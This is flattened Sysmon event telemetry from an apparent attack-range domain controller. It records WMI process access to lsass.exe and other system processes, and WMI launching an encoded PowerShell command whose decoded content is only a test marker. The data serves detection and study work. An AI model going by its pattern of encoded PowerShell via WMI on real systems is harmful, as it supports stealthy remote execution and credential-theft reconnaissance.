16:52:52.274{05ADC7E1-6D64-603E-79AA-00000000AD01}1379611392C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002236945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.271{05ADC7E1-6D64-603E-76AA-00000000AD01}8976ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ey0hzz35.awh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.270{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-79AA-00000000AD01}13796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002236943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.270{05ADC7E1-6D64-603E-76AA-00000000AD01}8976ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5nekstwe.3y2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.265{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.262{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.262{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002236937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-6D63-603E-72AA-00000000AD01}6720ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.260{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Encode VwByAGkAdABlAC0ASABvAHMAdAAgAGMANABiADEAMwBjADgANAAtADYAOAA5ADgALQA0AGEAMABlAC0AYQA2ADMANQAtADAAZAA5ADkAYgAzADQAYwBhAGQANwBiAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002236933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002236931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.247{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5nekstwe.3y2.ps12021-03-02 16:52:52.247 10341000x80000000000000002236930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-77AA-00000000AD01}11936C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 